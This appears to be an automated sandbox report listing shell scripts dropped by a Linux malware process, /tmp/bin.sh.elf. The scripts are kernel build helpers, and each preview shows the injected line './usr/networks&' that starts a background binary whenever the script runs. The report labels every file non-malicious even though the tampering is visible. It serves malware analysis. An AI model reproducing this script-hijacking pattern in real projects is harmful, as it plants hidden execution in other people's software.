                                                                        SHA-256:4FFCDD44FEDE7CB9CFBCC8017ABCD9D557B8DC5289D0F518C12B65A590D4CD0C
                                                                        SHA-512:61868A56A6993B4ECF3D4AEA9F00CE175C1E2A27EF8ADBF598B14288D63F143A2CEAC9CF7F55F4D19A52EBCF9332C2F5E6CA7CF4147BDA1A500B99A7A163D20A
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..if [ "$#" -ne 1 ]; then..echo "Usage: scripts/find-unused-docs.sh directory"..exit 1.fi..if ! [ -d "$1" ]; then..echo "Directory $1 doesn't exist"..exit 1.fi..cd "$( dirname "${BASH_SOURCE[0]}" )".cd ....cd Documentation/..echo "The following files contain kerneldoc comments for exported functions \.that are not used in the formatted documentation"..# FILES INCLUDED..files_included=($(grep -rHR ".. kernel-doc" --include \*.rst | cut -d " " -f 3))..declare -A FILES_INCLUDED..for each in "${files_included[@]}"; do..FILES_INCLUDED[$each]="$each"..done..cd ....# FILES NOT INCLUDED..for file in `find $1 -name '*.c'`; do...if [[ ${FILES_INCLUDED[$file]+_} ]]; then..continue;..fi..str=$(scripts/kernel-doc -export "$file" 2>/dev/null)..if [[ -n "$str" ]]; then..echo "$file"..fi..done.../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:C++ source, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):602
                                                                        Entropy (8bit):5.17249933912423
                                                                        Encrypted:false
                                                                        SSDEEP:12:w6vlg/1EkrFQsGvUogu3vInLRSKkqbhIAyNATWCGv7gTn:rlStrF1G90AKTbKr8Ui
                                                                        MD5:A87F8C76BA6B3031F82AB489E4AD42CA
                                                                        SHA1:DA856F308DA044257648AF722CDE0BA94AEB8487
                                                                        SHA-256:9BB298DE45E1FF2396B33933013251732C2119725A0EA1D18D7605CF6B2334E6
                                                                        SHA-512:05310DB15A63F5CD8B105E578FDA2B85EEBB5375DE3B798B31A2C5F8D4F79967A74AEA00294B8397A26081B5F2DFDF53AA339702B26346434C19F74D427B35A2
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..case "$plugincc" in..*"$1 CC"*)...echo "$1"...exit 0...;;...*"$2 CXX"*)...# the c++ compiler needs another test, see below...;;...*)...exit 1...;;.esac..# we need a c++ compiler that supports the designated initializer GNU extension.plugincc=$($2 -c -x c++ -std=gnu++98 - -fsyntax-only -I"${srctree}"/gcc-plugins -I"${gccplugins_dir}"/include 2>&1 <<EOF.#include "gcc-common.h".class test {.public:..int test;.} test = {...test = 1.};.EOF.)..if [ $? -eq 0 ].then..echo "$2"..exit 0.fi..if [ -n "$SHOW_ERROR" ] ; then..echo "${plugincc}" >&2.fi.exit 1../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):293
                                                                        Entropy (8bit):5.287996420109818
                                                                        Encrypted:false
                                                                        SSDEEP:6:w6vpCChdSmOCa3dSm7BC+gdSmxkA+JEe04n:w6vpCCWmOCa8mFC+hmWASpn
                                                                        MD5:9D9B956D66E83B77B2B88BD28622C783
                                                                        SHA1:FDDB267DAA99F989CDF8F519172780BE04770D74
                                                                        SHA-256:ED13B418C809B424C5F82283856D0E5996A7C2327B0B6422FEC03C2C3A173F7F
                                                                        SHA-512:079EA467DA6AC66570751D588397424D933B7639B5499B253B68BD0F7090F2AC4A1B279A2212714D4A9E7E11B418D9EEB8CA4BC2E7FDAAE3E260C5CF15CFC25F
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..MAJOR=$(echo __GNUC__ | $compiler -E -x c - | tail -n 1).MINOR=$(echo __GNUC_MINOR__ | $compiler -E -x c - | tail -n 1).PATCHLEVEL=$(echo __GNUC_PATCHLEVEL__ | $compiler -E -x c - | tail -n 1).printf "%d%02d%02d\\n" $MAJOR $MINOR $PATCHLEVEL../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):261
                                                                        Entropy (8bit):4.878194343450546
                                                                        Encrypted:false
                                                                        SSDEEP:6:wWI2VT758W9BFgkU5eAp3045Z4rk/OskN7n:ZIsl8eBtU5fiKZ40un
                                                                        MD5:0F89ECFD3269FA438F54A022D0ED1B9E
                                                                        SHA1:AA8EF09B70C8F11A1A344B12F4F0155EBAC55B7C
                                                                        SHA-256:231A5D5AB8024E6BF42F0D0BCA7F01ABDAD3C4F3828BD21F8CFF3B28183C7214
                                                                        SHA-512:DF0E041A38D0CA6821EE11D136E446535795D561637868D1F6AF8C88949D437D3B4BEA4DAF16A81C4DBCA3E134F361578C3955980460174E9309365BDFB16287
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 0.fi..echo.echo "ksymdeps_$1 := \\"..for s in $ksyms.do..echo $s | sed -e 's:^_*: $(wildcard include/ksym/:' \....-e 's:__*:/:g' -e 's/$/.h) \\/'.done..echo.echo "$1: \$(ksymdeps_$1)".echo.echo "\$(ksymdeps_$1):"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3232
                                                                        Entropy (8bit):5.719401961550023
                                                                        Encrypted:false
                                                                        SSDEEP:96:KWhJ8g5+JiYkgwiN+qoTKFuOdvxv5qRc/J/c/34vzq7:Kpg5R0RtVh0f4vO7
                                                                        MD5:5CF848AA3C163E4FD75E563D97B50B36
                                                                        SHA1:24AC6D3CFD1D134C30BADF420AD758510762A30F
                                                                        SHA-256:62A220CB3D964A0B72A1D47D6683CB43FB5DF0F04F511155D60EB0C747F8BD3B
                                                                        SHA-512:E0680D7B83F140B92C64AADC42ECEB15268EBA569CF51EAF695CBAB556289494EC4B162EF0A27BB62402A042C6F1EFB0313FCD2DCE763EED92B55876C94DAE57
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..# Grab arguments.INFILE=$1.OUTFILE=$2.TMPFILE=$OUTFILE.tmp..trap 'rm -f $OUTFILE $TMPFILE' EXIT..# SPDX-License-Identifier with GPL variants must have "WITH Linux-syscall-note".if [ -n "$(sed -n -e "/SPDX-License-Identifier:.*GPL-/{/WITH Linux-syscall-note/!p}" $INFILE)" ]; then..echo "error: $INFILE: missing \"WITH Linux-syscall-note\" for SPDX-License-Identifier" >&2..exit 1.fi..sed -E -e '..s/([[:space:](])(__user|__force|__iomem)[[:space:]]/\1/g..s/__attribute_const__([[:space:]]|$)/\1/g..s@^#include <linux/compiler(|_types).h>@@..s/(^|[^a-zA-Z0-9])__packed([^a-zA-Z0-9_]|$)/\1__attribute__((packed))\2/g..s/(^|[[:space:](])(inline|asm|volatile)([[:space:](]|$)/\1__\2__\3/g..s@#(ifndef|define|endif[[:space:]]*/[*])[[:space:]]*_UAPI@#\1 @.' $INFILE > $TMPFILE || exit 1..scripts/unifdef -U__KERNEL__ -D__EXPORTED_HEADERS__ $TMPFILE > $OUTFILE.[ $? -gt 1 ] && exit 1..# Remove /* ... */ style comments, and find CONFIG_ references in code.configs=$(sed -e '.:com
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):543
                                                                        Entropy (8bit):5.065619669350735
                                                                        Encrypted:false
                                                                        SSDEEP:12:w6vaDVR27MTCVT9GD6va2Ys74S6vMSASVRWGn:raDVR2AEGYae74pMSASqG
                                                                        MD5:E915887E36621505EC5730DC29D2298A
                                                                        SHA1:C0C7CB262A57CF220FFB76AB5BAF18AEAD18263D
                                                                        SHA-256:838808BA102CA4D94A9455E9492601B7794118EABB72CBF4C8FB5F36B0473CC1
                                                                        SHA-512:5431B59388C7DE50978F4A14DFEDF8A39693558C23EDA1B5979DDE08A36C90FE167908A4C3BC6CCE15B02756BAD64C589B231F28E08C8B0ADF7EB3E55D625B20
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..if ! pkg-config --exists $PKG; then..echo >&2 "*"..echo >&2 "* Unable to find the GTK+ installation. Please make sure that"..echo >&2 "* the GTK+ 2.0 development package is correctly installed."..echo >&2 "* You need $PKG"..echo >&2 "*"..exit 1.fi..if ! pkg-config --atleast-version=2.0.0 gtk+-2.0; then..echo >&2 "*"..echo >&2 "* GTK+ is present but version >= 2.0.0 is required."..echo >&2 "*"..exit 1.fi..echo cflags=\"$(pkg-config --cflags $PKG)\".echo libs=\"$(pkg-config --libs $PKG)\"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):937
                                                                        Entropy (8bit):5.114746161722375
                                                                        Encrypted:false
                                                                        SSDEEP:24:M8DySASNUS/tDRh8L9VnOITGvqMTGk1TGRSqMTGHyTGSqFhSRqj80UaT:M4yyp8HPUqMZVqM3PqQhOT
                                                                        MD5:FD01A2ED48E4F03577EE3CAED8CA3A76
                                                                        SHA1:04425B409496394CBCCAC34B85A0F364A2D671C9
                                                                        SHA-256:F6E93883CAE43A4A3DF14DF124FB15314977A7E9E44737B1010D01ECDB05393D
                                                                        SHA-512:C3238237408DE01A1E2326444753DCFD764A1DD2D8549CC92D86AA16BE571C8D7D144E7A47578D5C3F9C533639C869391345CAC10476E87146B4BDC5A8560819
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 0..fi...if pkg-config --exists $PKG2; then...echo cflags=\"$(pkg-config --cflags $PKG2)\"...echo libs=\"$(pkg-config --libs $PKG2)\"...exit 0..fi.fi..# Check the default paths in case pkg-config is not installed..# (Even if it is installed, some distributions such as openSUSE cannot.# find ncurses by pkg-config.).if [ -f /usr/include/ncursesw/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE -I/usr/include/ncursesw\"..echo libs=\"-lncursesw\"..exit 0.fi..if [ -f /usr/include/ncurses/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE -I/usr/include/ncurses\"..echo libs=\"-lncurses\"..exit 0.fi..if [ -f /usr/include/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE\"..echo libs=\"-lncurses\"..exit 0.fi..echo >&2 "*".echo >&2 "* Unable to find the ncurses package.".echo >&2 "* Install ncurses (ncurses-devel or libncurses-dev".echo >&2 "* depending on your distribution).".echo >&2 "*".exit 1../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3316
                                                                        Entropy (8bit):5.543534555649817
                                                                        Encrypted:false
                                                                        SSDEEP:96:KqG3UXD1JB2y/p0ko0+bgXX0OgAcY0jy84wEIseQIbbFS:bG3y1JB2y9+UXEhAD0jy8rEY3FS
                                                                        MD5:953A81654F7307688C8402BDA37C2EA4
                                                                        SHA1:293F65679CA388602BEAA31F2A5CBCE08AC8FC11
                                                                        SHA-256:794B3905FD480E6EABC275800C2981278620AD0FDEA13F8A700AB9A3B0DAB741
                                                                        SHA-512:AA66F2D6DFA3379E4ECB17C2D95FDC77794A8F29719EEAE736DAECE66DDEF6970BAF3568181C59EE02138BAB5281A3DCA232A02D80BC252667A569538BFA52BE
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit...;;.."-r")...WARNREDUN=true...shift...continue...;;.."-y")...BUILTIN=true...shift...continue...;;.."-O")...if [ -d $2 ];then....OUTPUT=$(echo $2 | sed 's/\/*$//')...else....echo "output directory $2 does not exist" 1>&2....exit 1...fi...shift 2...continue...;;..*)...break...;;..esac.done..if [ "$#" -lt 1 ] ; then..usage..exit.fi..if [ -z "$KCONFIG_CONFIG" ]; then..if [ "$OUTPUT" != . ]; then...KCONFIG_CONFIG=$(readlink -m -- "$OUTPUT/.config")..else...KCONFIG_CONFIG=.config..fi.fi..INITFILE=$1.shift;..if [ ! -r "$INITFILE" ]; then..echo "The base file '$INITFILE' does not exist. Exit." >&2..exit 1.fi..MERGE_LIST=$*.SED_CONFIG_EXP1="s/^\(${CONFIG_PREFIX}[a-zA-Z0-9_]*\)=.*/\1/p".SED_CONFIG_EXP2="s/^# \(${CONFIG_PREFIX}[a-zA-Z0-9_]*\) is not set$/\1/p"..TMP_FILE=$(mktemp ./.tmp.config.XXXXXXXXXX).MERGE_FILE=$(mktemp ./.merge_tmp.config.XXXXXXXXXX)..echo "Using $INITFILE as base"..trap clean_up EXIT..cat $INITFILE > $TMP_FILE..# Merge files, printing warnings on ov
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):984
                                                                        Entropy (8bit):5.110032530027797
                                                                        Encrypted:false
                                                                        SSDEEP:24:M8DySASNUS/tDRh8L9VnOITGvqMTGkGTGRSqMTGHvTGSqF2SRqj80UaT:M4yyp8HPUqMaVqMMPqnhOT
                                                                        MD5:D9E63E4727EEEE4A282F447A955DB059
                                                                        SHA1:79CDDDC7912CF9F945B8B001E5AC69A1077D64E8
                                                                        SHA-256:E97AFE8D30A5A9A97D8E6F922DBA587C5A5745C48A8DE70C72A012EFD771C632
                                                                        SHA-512:163C0ECCE5F2FC859B13DBEED889DFA46F77D27CBD563965ACB32F3B06469EF1709E6A62185509B76E5C731A1611E88F757B490277C5A3D2862AB77022851199
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 0..fi...if pkg-config --exists $PKG2; then...echo cflags=\"$(pkg-config --cflags $PKG2)\"...echo libs=\"$(pkg-config --libs $PKG2)\"...exit 0..fi.fi..# Check the default paths in case pkg-config is not installed..# (Even if it is installed, some distributions such as openSUSE cannot.# find ncurses by pkg-config.).if [ -f /usr/include/ncursesw/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE -I/usr/include/ncursesw\"..echo libs=\"-lncursesw -lmenuw -lpanelw\"..exit 0.fi..if [ -f /usr/include/ncurses/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE -I/usr/include/ncurses\"..echo libs=\"-lncurses -lmenu -lpanel\"..exit 0.fi..if [ -f /usr/include/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE\"..echo libs=\"-lncurses -lmenu -lpanel\"..exit 0.fi..echo >&2 "*".echo >&2 "* Unable to find the ncurses package.".echo >&2 "* Install ncurses (ncurses-devel or libncurses-dev".echo >&2 "* depending on your distribution).".echo >&2 "*".exit 1../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):644
                                                                        Entropy (8bit):5.228498774032447
                                                                        Encrypted:false
                                                                        SSDEEP:12:w6vQ7QDR5GSVQzMWejGQ77QDxSASVhrMWGNGBvRrkFkjr9dn0puyTn:r3DR5GS2ZUGxDxSASRsGBvpkFkddn0J
                                                                        MD5:2B410BC9465C65BB5548FD8FA489FC20
                                                                        SHA1:B040F7C49A2B32DD74971B2BA918D956F18ADCF0
                                                                        SHA-256:4815CCA4D8102C93E1E7FBDD35FDF59B52B31A7FC9C5FE6743A38023E689170A
                                                                        SHA-512:9AA861B53D53811916F5A54DFEA3474447F343F7282A8EA054F896235A27A7445FCE49AF3CB71C5095846E5FC3C9C301F2790CF686F7D632761F3BDC06E4ADA8
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..if pkg-config --exists $PKG; then..echo cflags=\"-std=c++11 -fPIC $(pkg-config --cflags Qt5Core Qt5Gui Qt5Widgets)\"..echo libs=\"$(pkg-config --libs $PKG)\"..echo moc=\"$(pkg-config --variable=host_bins Qt5Core)/moc\"..exit 0.fi..if pkg-config --exists $PKG2; then..echo cflags=\"$(pkg-config --cflags $PKG2)\"..echo libs=\"$(pkg-config --libs $PKG2)\"..echo moc=\"$(pkg-config --variable=moc_location QtCore)\"..exit 0.fi..echo >&2 "*".echo >&2 "* Could not find Qt via pkg-config.".echo >&2 "* Please install either Qt 4.8 or 5.x. and make sure it's in PKG_CONFIG_PATH".echo >&2 "*".exit 1../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):48
                                                                        Entropy (8bit):3.9672232412544224
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVaroOORgn:Bn
                                                                        MD5:553252F0DEE7D4E172F4B27C1491B5C5
                                                                        SHA1:D9514909B4689F279C9FEC25124B8C1DE69A74E8
                                                                        SHA-256:4A0B5069B54319442EB5F6DF6ADB1D6A9F2BBEB0B540465B2818AC5A51A4C6A8
                                                                        SHA-512:7245D00F3A1441F8B10EBE51126FB41609F0C1CF06CEF4BD9320C1D4A8046AC1EA7C421C66131058F73AED16F01CFF3E879DAC85FD6B1FA2E7499E733A38401C
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit..}../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3104
                                                                        Entropy (8bit):5.319473187672963
                                                                        Encrypted:false
                                                                        SSDEEP:48:CvglysBnQd18RgbICaKw6i7MQ0aiRJygJKQCPh3NY1PeUyOeaU6CkRx7X:sJgnQCgbKKw6iPFVNoPetFgL
                                                                        MD5:7C45113DDC652E13DE69CC646EDE42D0
                                                                        SHA1:AB7A40BF4E6FCDC9597545ACB0CC0AD28294684E
                                                                        SHA-256:0095A846AF18E74F2B8C358599A28829A2012F6643261F22F88F418B5A968900
                                                                        SHA-512:BA067807CD4118C2360B14A4E258FF004048D461854B4ECF84FF7339C767E39D7B4BA9682E8D4C40C47F5BEC788E2CCC93C54727CA19601F80C015D680078D3A
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.on_exit().{..if [ $? -ne 0 ]; then...cleanup..fi.}.trap on_exit EXIT..on_signals().{..exit 1.}.trap on_signals HUP INT QUIT TERM..#.#.# Use "make V=1" to debug this script.case "${KBUILD_VERBOSE}" in.*1*)..set -x..;;.esac..if [ "$1" = "clean" ]; then..cleanup..exit 0.fi..# We need access to CONFIG_ symbols.. include/config/auto.conf..# Update version.info GEN .version.if [ -r .version ]; then..VERSION=$(expr 0$(cat .version) + 1)..echo $VERSION > .version.else..rm -f .version..echo 1 > .version.fi;..# final build of init/.${MAKE} -f "${srctree}/scripts/Makefile.build" obj=init..#link vmlinux.o.info LD vmlinux.o.modpost_link vmlinux.o..# modpost vmlinux.o to check for section mismatches.${MAKE} -f "${srctree}/scripts/Makefile.modpost" MODPOST_VMLINUX=1..info MODINFO modules.builtin.modinfo.${OBJCOPY} -j .modinfo -O binary vmlinux.o modules.builtin.modinfo..btf_vmlinux_bin_o="".if [ -n "${CONFIG_DEBUG_INFO_BTF}" ]; then..btf_vmlinux_bin_o=.btf.vmlinux.bin.o..if ! gen_btf
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):113
                                                                        Entropy (8bit):4.89780484089231
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVPnhdzHFTMcA+URkjAd8HHBdKDXVOORgn:cnhdzlokjAdae4n
                                                                        MD5:83D2F205EC6B453B25B80B148277906B
                                                                        SHA1:2640110859CC7FB91BCAB211917F85BCE21CE507
                                                                        SHA-256:99D204944A4F242841E7E5B06FF76B7F484F08D4893F84B3A599730306F24305
                                                                        SHA-512:B81E66A2B1E64AAB63558F078598360D98AF3DD11ECA2B01D67AA52F53536DF4AE30A2397AB55D389F59259807F1B06CFC69C1DF41630449BE4400D4FD3CD53D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1;..fi.fi..# Call "mkimage" to create U-Boot image.${MKIMAGE} "$@"../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2256
                                                                        Entropy (8bit):5.103102723612671
                                                                        Encrypted:false
                                                                        SSDEEP:48:r3DF8L0vw6FI7GSECAi4zDYGc0VXDfjX4D9mt+7F5IWpkCPKLJJSJbRhAaD:W6X3QcfTLp2VD
                                                                        MD5:AF1E91F2E72D207A26007E51ED3846F7
                                                                        SHA1:3DA415BBA18AB54473D970F38F8E4EE3C90EC66B
                                                                        SHA-256:969556D61B9A7975233D78D3F8BDA1F10D1624692597F505C2F0149A98AAC940
                                                                        SHA-512:B37F388A5E14C93170530310BB0A53A29F9D97E749D8F41B1ABA1EC6B64E6C40AF5825CDA211DA3BC6D541F8A506BC79B0020A3FB64EBAB09C82C59CB0DC1226
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 1.fi..SF=`which setfiles`.if [ $? -eq 1 ]; then..echo "Could not find setfiles"..echo "Do you have policycoreutils installed?"..exit 1.fi..CP=`which checkpolicy`.if [ $? -eq 1 ]; then..echo "Could not find checkpolicy"..echo "Do you have checkpolicy installed?"..exit 1.fi.VERS=`$CP -V | awk '{print $1}'`..ENABLED=`which selinuxenabled`.if [ $? -eq 1 ]; then..echo "Could not find selinuxenabled"..echo "Do you have libselinux-utils installed?"..exit 1.fi..if selinuxenabled; then. echo "SELinux is already enabled". echo "This prevents safely relabeling all files.". echo "Boot with selinux=0 on the kernel command-line or". echo "SELINUX=disabled in /etc/selinux/config.". exit 1.fi..cd mdp../mdp -m policy.conf file_contexts.$CP -U allow -M -o policy.$VERS policy.conf..mkdir -p /etc/selinux/dummy/policy.mkdir -p /etc/selinux/dummy/contexts/files..echo "__default__:user_u:s0" > /etc/selinux/dummy/seusers.echo "base_r:base_t:s0" > /etc/selinux/dummy/context
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1837
                                                                        Entropy (8bit):5.370491142600355
                                                                        Encrypted:false
                                                                        SSDEEP:24:St5ewlRPEuhVVNBRocmWTfF6oFtEhn5EpMAF6kFSqAAuqA1H1/zF+vQLZE6:QIjIBRoc7B6oFtE5wM0FzjdwH1/QEj
                                                                        MD5:2924623DFB48348E3CADD1409DB02819
                                                                        SHA1:0980E6BB937886B45B03015771B405BAF981133A
                                                                        SHA-256:12D814E1083E8E2BDC73AAF4066F9C331288D1D4D26F308E6A46B56DAD520732
                                                                        SHA-512:D7205986E227281642FE78C2919D205F0404AFDE5B16E295F79AAB08BDC44DA1266FA913611A46EEE7206BA5555CD01EB2995BDDA91970051A5F4DBE7CB5F059
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..-I __initdata,__exitdata,__initconst,__ro_after_init.\..-I __initdata_memblock.....\..-I __refdata,__attribute,__maybe_unused,__always_unused \..-I __acquires,__releases,__deprecated,__always_inline.\..-I __read_mostly,__aligned,____cacheline_aligned \..-I ____cacheline_aligned_in_smp \..-I __cacheline_aligned,__cacheline_aligned_in_smp.\..-I ____cacheline_internodealigned_in_smp \..-I __used,__packed,__packed2__,__must_check,__must_hold.\..-I EXPORT_SYMBOL,EXPORT_SYMBOL_GPL,ACPI_EXPORT_SYMBOL \..-I DEFINE_TRACE,EXPORT_TRACEPOINT_SYMBOL,EXPORT_TRACEPOINT_SYMBOL_GPL \..-I static,const......\..--extra=+fq --c-kinds=+px --fields=+iaS --langmap=c:+.h \.."${regex[@]}"...setup_regex exuberant kconfig..all_kconfigs | xargs $1 -a \..--langdef=kconfig --language-force=kconfig "${regex[@]}"..}..emacs().{..setup_regex emacs asm c..all_target_sources | xargs $1 -a "${regex[@]}"...setup_regex emacs kconfig
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):283
                                                                        Entropy (8bit):4.83654391993755
                                                                        Encrypted:false
                                                                        SSDEEP:6:xE6TVbTuqFQ7oK7qTIFs1OhOiQQLO5F8QUQjbTn:nbTu+Q52ce1ONQwOcrmbTn
                                                                        MD5:4DF442F6E11CE8D0979E6182386686A2
                                                                        SHA1:81719268B3AEDA9531465D3EAC4E67AAEDCA1397
                                                                        SHA-256:55264C606A6D80EC711BEAAF12EF38C1F10BEF9142291CFAF653B3F823FE842B
                                                                        SHA-512:F8D1E831F9226792250715F5EFDDA938690FE986AE4B84257A5990DECCAF0361A1519F2DBDB4D3082513A590D373B879739AC42A10047C29FDF13A39EB2A8E42
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.# Despite printing an error message, GNU nm still exits with exit code 0 if it.# sees a relr section. So we need to check that nothing is printed to stderr..test -z "$($NM $tmp_file 2>&1 >/dev/null)"..$OBJCOPY -O binary $tmp_file $tmp_file.bin../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):625
                                                                        Entropy (8bit):4.736984587737299
                                                                        Encrypted:false
                                                                        SSDEEP:12:aSCPoUOEmrGTUF6vGWzz+NSI9ZZ+gwSUz+NSI9ZZ+g/AcEMdLPn:58wGTRGWG8I9ZkpSj8I9ZkuhP
                                                                        MD5:04209F5550AAEBD8875831972E159484
                                                                        SHA1:35BD4A57B4F79218468D56CC721F7AE667F6A800
                                                                        SHA-256:E4D56D5F89198BA7EB9F942E04AFAD0DB90E9A733589881EF18CDAAF597A3B20
